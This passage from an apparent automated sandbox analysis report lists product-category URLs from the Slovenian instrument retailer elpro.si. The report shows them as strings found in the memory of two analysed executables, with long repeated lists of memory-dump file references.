00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/izdelek/v400-7022-temperaturno-tipalo-uporovno-rtd-vticno-s-prikljucnim-kablom-
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/analizatorji-dimnih-plinov-kamere-in-ostala-oprema/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/analizatorji-dimnih-plinov-kamere-in-ostala-oprema/analizato
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/analizatorji-dimnih-plinov-kamere-in-ostala-oprema/aplikacij
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/analizatorji-dimnih-plinov-kamere-in-ostala-oprema/kamere-en
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/analizatorji-dimnih-plinov-kamere-in-ostala-oprema/merilnik-
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/analizatorji-dimnih-plinov-kamere-in-ostala-oprema/potrosni-
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/arhiv/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/datalog
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/dodatna
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/lastnov
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/merilni
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/monitor
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/prenosn
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/program
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/radiaci
